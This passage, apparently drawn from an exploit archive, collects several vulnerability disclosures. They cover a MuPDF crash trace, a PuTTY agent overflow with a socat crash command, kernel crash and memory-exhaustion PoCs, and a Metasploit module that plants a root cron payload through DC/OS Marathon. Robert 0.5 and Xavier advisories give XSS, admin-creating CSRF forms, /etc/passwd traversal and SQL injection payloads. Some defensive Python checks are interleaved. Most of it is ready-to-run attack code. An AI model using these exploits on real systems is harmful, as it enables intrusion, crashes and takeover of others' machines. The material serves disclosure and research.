#13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
#14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
#15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
#16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
#17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
#18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
#19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
#20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
==1406==ABORTING
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42138.zip
Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html
summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections
class: vulnerability: This is a security vulnerability.
difficulty: fun: Just needs tuits, and not many of them.
priority: high: This should be fixed in the next release.
present-in: 0.67
fixed-in: 4ff22863d895cb7ebfced4cf923a012a614adaa8 (0.68)
Many versions of PuTTY prior to 0.68 have a heap-corrupting integer overflow bug in the ssh_agent_channel_data function which processes messages sent by remote SSH clients to a forwarded agent connection.
The agent protocol begins every message with a 32-bit length field, which gives the length of the remainder of the message, not including the length field itself. In order to accumulate the entire message including the length field in an internal buffer, PuTTY added 4 to the received length value, to obtain the message length inclusive of everything. This addition was unfortunately missing a check for unsigned integer overflow.
Hence, sending a length field large enough to overflow when 4 is added to it, such as 0xFFFFFFFD, would cause PuTTY to record a value for the total message length (totallen) which was smaller than the amount of data it had already seen (lensofar, which at this point would be 4 bytes for the length field itself). Then, it would assume that the expression totallen-lensofar represented the amount of space it was safe to write into its buffer; but in fact, in the overflowing case, this value would wrap back round to a number just less than 2^32, far larger than the allocated heap block, and PuTTY could be induced to overwrite its heap with data sent by the attacker.
If your server is running Linux or any reasonably similar Unix, and has the socat network utility installed, then you can use this simple proof of concept to determine whether you are affected. Simply run the shell command
(echo -ne '\xFF\xFF\xFF\xFD\x0B'; cat /dev/zero) | socat stdio unix-connect:$SSH_AUTH_SOCK
and PuTTY will crash.
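The arithmetic above, modelled as an added example (this is not PuTTY's code): the first function reproduces the unchecked `len + 4` and `totallen - lensofar` computations in unsigned 32-bit arithmetic, the second shows the check that makes them safe, and the parser reads the length prefix from the first bytes of the socat PoC. The 262144-byte buffer size is an assumption for the example, not PuTTY's value.

```python
import struct

MASK32 = 0xFFFFFFFF  # unsigned 32-bit arithmetic, as in the C code


def parse_agent_length(data: bytes) -> int:
    """Read the big-endian 32-bit length that opens every agent message."""
    if len(data) < 4:
        raise ValueError("need at least 4 bytes")
    return struct.unpack(">I", data[:4])[0]


def agent_space_vulnerable(msglen: int, lensofar: int) -> int:
    """Model of the pre-0.68 logic: totallen = len + 4 and
    space = totallen - lensofar, both unsigned 32-bit, no overflow check."""
    totallen = (msglen + 4) & MASK32         # wraps once msglen >= 0xFFFFFFFC
    return (totallen - lensofar) & MASK32    # wraps again: just under 2**32


def agent_space_checked(msglen: int, lensofar: int, bufsize: int):
    """Hardened variant: reject lengths that cannot be represented and never
    report more space than the buffer holds. Returns None on rejection."""
    if msglen > MASK32 - 4:
        return None                          # len + 4 would overflow
    totallen = msglen + 4
    if totallen > bufsize or lensofar > totallen:
        return None
    return totallen - lensofar


# Constructed input: the first five bytes sent by the advisory's socat PoC.
POC_PREFIX = b"\xff\xff\xff\xfd\x0b"

if __name__ == "__main__":
    n = parse_agent_length(POC_PREFIX)
    print("length field: 0x%08x" % n)
    print("buggy 'space left': 0x%08x" % agent_space_vulnerable(n, 4))
    print("checked: %r" % agent_space_checked(n, 4, 262144))  # assumed buffer size
```

With the PoC's 0xFFFFFFFD the buggy computation reports 0xFFFFFFFD bytes of free space in a buffer that is a few hundred kilobytes at most; the checked version refuses the message before any copy happens.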
This bug is only exploitable at all if you have enabled SSH agent forwarding, which is turned off by default. Moreover, an attacker able to exploit this bug would already have to be able to connect to the Unix-domain socket representing the forwarded agent connection. Since any attacker with that capability would necessarily already be able to generate signatures with your agent's stored private keys, you should in normal circumstances be defended against this vulnerability by the same precautions you and your operating system were already taking to prevent untrusted people from accessing your SSH agent.
This vulnerability was reported by Tim Kosse, and has been assigned CVE ID CVE-2017-6542.
/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:
gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472
(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>
int main()
{
for (;;)
keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}
// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c
// Build with: gcc -pthread -o panic panic.c
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static int sockfd = 0;
static struct sockaddr_in addr = {0};

/* Worker thread: keeps calling connect() with sin_family = 0 on the same
 * shared sockaddr that the main thread is modifying, so the two connect()
 * calls race on the address family. */
static void *fuzz(void *param)
{
    (void)param;
    while (1) {
        addr.sin_family = 0; /* rand()%42 in the original fuzzing run */
        printf("sin_family1 = %04x\n", addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
    }
    return NULL;
}

int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;
    /* ICMP datagram ("ping") socket, available to unprivileged users */
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }
    pthread_t thrd;
    pthread_create(&thrd, NULL, fuzz, NULL);
    while (1) {
        addr.sin_family = 0x1a; /* rand()%42 in the original fuzzing run */
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
        addr.sin_family = 0;
    }
    return 0;
}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'DC/OS Marathon UI Docker Exploit',
'Description' => %q{
Utilizing the DC/OS cluster's Marathon UI, an attacker can create
a Docker container with the host's '/' path bind-mounted read/write
inside the container. Because commands in the container run as
uid 0 and the host honours that uid on the bind mount, the attacker
can edit and create files owned by root on the host. This exploit
abuses that to create a cron job in the host's '/etc/cron.d/' path.
*Notes: The Docker image must be a valid image from
hub.docker.com. Furthermore, the container will only
deploy if there are resources available in the DC/OS cluster.
},
'Author' => 'Erik Daguerre',
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
],
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}
]
],
'DefaultOptions' => { 'WfsDelay' => 75 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 03, 2017'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
])
end
def get_apps
res = send_request_raw({
'method' => 'GET',
'uri' => target_uri.path
})
return unless res and res.code == 200
# verify it is marathon ui, and is returning content-type json
return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
apps = JSON.parse(res.body)
apps
end
def del_container(container_id)
res = send_request_raw({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, container_id)
})
return unless res and res.code == 200
res.code
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
payload_data = nil
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
command << "echo \"\" >> #{echo_cron_path}\n"
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
command << "sleep 120"
command
end
def make_container(mnt_path, cron_path, payload_path, container_id)
vprint_status('Setting container json request variables')
container_data = {
'cmd' => make_cmd(mnt_path, cron_path, payload_path),
'cpus' => 1,
'mem' => 128,
'disk' => 0,
'instances' => 1,
'id' => container_id,
'container' => {
'docker' => {
'image' => datastore['DOCKERIMAGE'],
'network' => 'HOST',
},
'type' => 'DOCKER',
'volumes' => [
{
'hostPath' => '/',
'containerPath' => mnt_path,
'mode' => 'RW'
}
],
},
'env' => {},
'labels' => {}
}
container_data
end
def check
return Exploit::CheckCode::Safe if get_apps.nil?
Exploit::CheckCode::Appears
end
def exploit
if get_apps.nil?
fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id()
res = send_request_raw({
'method' => 'POST',
'uri' => target_uri.path,
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
})
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
print_status('The docker container is created, waiting for it to deploy')
register_files_for_cleanup(cron_path, payload_path)
sleep_time = 5
wait_time = datastore['WAIT_TIMEOUT']
deleted_container = false
print_status("Waiting up to #{wait_time} seconds for docker container to start")
while wait_time > 0
sleep(sleep_time)
wait_time -= sleep_time
apps_status = get_apps
fail_with(Failure::Unknown, 'No apps returned') unless apps_status
apps_status['apps'].each do |app|
next if app['id'] != "/#{container_id}"
if app['tasksRunning'] == 1
print_status('The docker container is running, removing it')
del_container(container_id)
deleted_container = true
wait_time = 0
else
vprint_status('The docker container is not yet running')
end
break
end
end
# If the docker container does not deploy remove it and fail out.
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to start")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end
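The container definition the module posts is the thing to hunt for on the defending side: a `volumes` entry whose `hostPath` is `/` (or another path that amounts to the host). As an added example, not part of the Metasploit module, the Python below walks a saved Marathon `/v2/apps` response and returns one finding per volume that exposes a sensitive host path. The sample response and the list of sensitive paths are constructed for this example.

```python
import json
import posixpath

# Host paths whose exposure to a container amounts to host compromise.
# Constructed for this example; extend to taste.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/boot", "/proc", "/sys",
                        "/var/run/docker.sock")


def is_sensitive_host_path(host_path: str) -> bool:
    """True if host_path is, or lies under, one of the sensitive paths.
    normpath folds tricks like '/mnt/../' back to '/'."""
    norm = posixpath.normpath(host_path)
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p.rstrip("/") + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def audit_marathon_apps(apps_doc: dict) -> list:
    """Walk a Marathon /v2/apps document; return a finding for every volume
    that bind-mounts a sensitive host path into a container."""
    findings = []
    for app in apps_doc.get("apps", []):
        container = app.get("container") or {}
        docker = container.get("docker") or {}
        for vol in container.get("volumes", []):
            host_path = vol.get("hostPath")
            if not host_path or not is_sensitive_host_path(host_path):
                continue
            mode = vol.get("mode", "RW")
            findings.append({
                "app": app.get("id"),
                "image": docker.get("image"),
                "network": docker.get("network"),
                "hostPath": host_path,
                "containerPath": vol.get("containerPath"),
                "mode": mode,
                "impact": "host write" if mode == "RW" else "host read",
            })
    return findings


# Constructed sample: one app shaped like the module's request, one benign app.
SAMPLE_APPS = json.loads("""
{"apps": [
  {"id": "/abcdefgh",
   "cmd": "echo ... >> /mnt/xyz/etc/cron.d/x\\nsleep 120",
   "container": {"type": "DOCKER",
                 "docker": {"image": "python:3-slim", "network": "HOST"},
                 "volumes": [{"hostPath": "/", "containerPath": "/mnt/xyz", "mode": "RW"}]}},
  {"id": "/web",
   "container": {"type": "DOCKER",
                 "docker": {"image": "nginx:1.13", "network": "BRIDGE"},
                 "volumes": [{"hostPath": "/data/web", "containerPath": "/srv", "mode": "RO"}]}}
]}
""")

if __name__ == "__main__":
    for finding in audit_marathon_apps(SAMPLE_APPS):
        print(finding)
```

Point it at `curl http://marathon:8080/v2/apps` output; an unauthenticated Marathon API that answers that request at all is itself the first finding.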
# Exploit Title: Robert 0.5 - Multiple Vulnerabilities (XSS, CSRF, Directory Traversal & SQLi)
# Date: 07/06/2017
# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
# Vendor website :http://robert.polosson.com/
# Download link : https://github.com/RobertManager/robert/archive/master.zip
# Live demo : http://robertdemo.polosson.com/
# Version: 0.5
# Tested on: Windows 7 x64 SP1 / Kali Linux
Robert is an open-source web application for managing a pool of equipment for rental or loan,
written in HTML, PHP, MySQL, CSS and JavaScript.
Description: multiple security issues have been found: XSS, CSRF, directory traversal and SQL injection.
1- XSS reflected
http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E
param vuln : go
script vuln : index.php
2- XSS reflected
POST /robert/modals/personnel_list_techniciens.php
data :
searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom
param vuln : searchingfor
script vuln : personnel_list_techniciens.php
3- XSS Stored
POST /robert/fct/matos_actions.php
data:
action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
param vuln : label, ref and remarque
script vuln : matos_actions.php
4- XSS Stored
POST /robert/fct/packs_actions.php
data
:action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1}
param vuln : label, ref and remarque
script vuln : packs_actions.php
5- XSS stored
POST /robert/fct/beneficiaires_actions.php
action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic=
param vuln : surnom, prenom, nom
script vuln : beneficiaires_actions.php
6- XSS stored
POST /robert/fct/tekos_actions.php
action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
param vuln : label, type, adresse, ville, email, SIRET and remarque
script vuln : tekos_actions.php
7- CSRF Create new admin
<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="create"/>
<input type="hidden" name="cMail" value="hacked@hacked.com"/>
<input type="hidden" name="cName" value="hacked"/>
<input type="hidden" name="cPren" value="hacked"/>
<input type="hidden" name="cPass" value="hacked"/>
<input type="hidden" name="cLevel" value="7"/>
<input type="hidden" name="cTekos" value="0"/>
<input type="submit" value="CSRFED This Shit"/>
</form>
8- CSRF Change admin password and infos
<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="modifOwnUser"/>
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="email" value="hacked"/>
<input type="hidden" name="nom" value="hacked"/>
<input type="hidden" name="prenom" value="hacked"/>
<input type="hidden" name="password" value="hacked"/>
<input type="submit" value="CSRFED This Shit"/>
</form>
9- Directory traversal in the download function (arbitrary file read)
http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd
param vuln : file
script vuln : downloader.php
10- Directory traversal in the upload function (write an uploaded file outside the upload folder)
POST /robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
X-File-Name: filename.jpg
Content-Type: application/octet-stream
Referer: http://192.168.3.215/robert/index.php?go=gens
Content-Length: 99550
Cookie: YOURCOOKIE
Connection: close
...snip...
file data
...snip...
param vuln : folder
script vuln : uploader.php
11- Directory traversal in the delete function (arbitrary file delete)
POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 42
Cookie:YOURCOOKIE
Connection: close
action=supprFichier&idPlan=4&file=../../../../tested.txt
param vuln : file
script vuln : plans_actions.php
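Items 9, 10 and 11 are one bug in three places: a `dir`/`folder`/`file` value is joined onto a base directory without checking that the result stays inside it. As an added example (Python rather than the application's PHP, and not Robert's own code), here is the check the three handlers need: the directory name must come from an allowlist, the file name must contain no separators, and the joined path must still lie under the base directory after normalisation. The base directory and allowlist are assumptions for the example.

```python
import posixpath

# Constructed for this example: where the application is assumed to keep the
# files that downloader.php, uploader.php and plans_actions.php operate on.
BASE_DIR = "/var/www/robert/files"
ALLOWED_DIRS = {"sql", "tekos", "plans"}


def safe_join(base: str, *parts: str):
    """Join user-supplied path parts under base. Returns None if any part is
    empty, absolute or contains a NUL byte, or if the normalised result
    escapes base (the '../../../../etc/passwd' case)."""
    for part in parts:
        if not part or "\x00" in part or part.startswith("/"):
            return None
    base_norm = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base_norm, *parts))
    if candidate != base_norm and not candidate.startswith(base_norm + "/"):
        return None
    return candidate


def resolve_user_path(dir_name: str, file_name: str):
    """The check for dir=...&file=... (download), folder=...&qqfile=...
    (upload) and file=... (delete): allowlisted directory, bare file name,
    and the joined path must stay under BASE_DIR."""
    if dir_name not in ALLOWED_DIRS:
        return None
    if posixpath.basename(file_name) != file_name:
        return None  # a file name never contains a separator
    return safe_join(BASE_DIR, dir_name, file_name)


if __name__ == "__main__":
    for d, f in (("sql", "backup.sql"),
                 ("sql", "../../../../../../etc/passwd"),
                 ("../../config", "filename.jpg"),
                 ("plans", "../../../../tested.txt")):
        print("%-14s %-32s -> %r" % (d, f, resolve_user_path(d, f)))
```

The allowlist makes `safe_join`'s prefix test redundant for the directory part; it stays in as defence in depth for callers that pass a path the allowlist does not cover.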
12- SQL Injection
POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 20
Cookie: YOURCOOKIE
Connection: close
action=loadPlan&ID=2'
POST parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 397 HTTP(s) requests:
---
Parameter: ID (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: action=loadPlan&ID=2' OR NOT 8111=8111#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: action=loadPlan&ID=2';SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN
---
param vuln : ID
script vuln : plans_actions.php
------------------------------------------------------------------------------------------------------------------------------
#### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit SecTeam ####
------------------------------------------------------------------------------------------------------------------------------
Document Title:
===============
Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2076
Release Date:
=============
2017-06-06
Vulnerability Laboratory ID (VL-ID):
====================================
2076
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page.
You can also protect sections of pages. Secure your web pages or sections of content dependant on whether your users are logged in or out,
or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator.
(Copy of the Homepage: https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application.
Vulnerability Disclosure Timeline:
==================================
2017-06-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Siggles
Product: Xavier - PHP Login Script & User Management Admin Panel 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple SQL injection vulnerabilities have been discovered in the Xavier PHP Login Script & User Management Admin Panel web application.
The issue allows remote attackers to inject their own SQL commands and compromise the web application and the database management system.
The SQL injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuseredit.php` and `editgroup.php` files.
Remote attackers with a privileged user account are able to compromise the web application and database management system by injecting SQL
commands through a GET request. The vulnerability is a classic ORDER BY SQL injection: the parameter is appended to the query unquoted, so
`1 order by 3--` is executed as part of the statement.
The security risk of the SQL injection vulnerability is estimated as medium with a CVSS score of 5.3.
Exploitation of the remote SQL injection vulnerability requires an authenticated web application user account and no user interaction.
Successful exploitation of the SQL injection vulnerability results in web application or database management system compromise.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] adminuseredit.php
[+] editgroup.php
Vulnerable Parameter(s):
[+] usertoedit
[+] log_id
Proof of Concept (PoC):
=======================
The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Example
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[SQL-INJECTION VULNERABILITY!]
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[SQL-INJECTION VULNERABILITY!]
PoC: Exploitation
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203--
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203--
--- SQL Error & Exception Logs ---
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]:
Column not found: 1054 Unknown column '100' in 'order clause''
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1'
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1'
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...')
#1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[SQL-INJECTION VULNERABILITY!]--
Mime Type[text/html]
Request Header:
Host[xavier-php.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache]
Keep-Alive[timeout=2, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
-
20:49:05.559[216ms][total 277ms] Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[SQL-INJECTION VULNERABILITY!]--
Mime Type[text/html]
Request Header:
Host[xavier-php.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache]
Keep-Alive[timeout=2, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
Reference(s):
https://xavier-php.localhost:8080/
https://xavier-php.localhost:8080/xavier/
https://xavier-php.localhost:8080/xavier/admin/
https://xavier-php.localhost:8080/xavier/admin/editgroup.php
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php
Solution - Fix & Patch:
=======================
The vulnerability can be patched by strictly validating (and escaping) the vulnerable parameters in the affected PHP files.
Restrict the parameter input to the expected integer identifiers and use prepared statements in the admin panel's database functions.
Disable the display of PHP errors in the panel so that error messages do not assist attacks.
Security Risk:
==============
The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
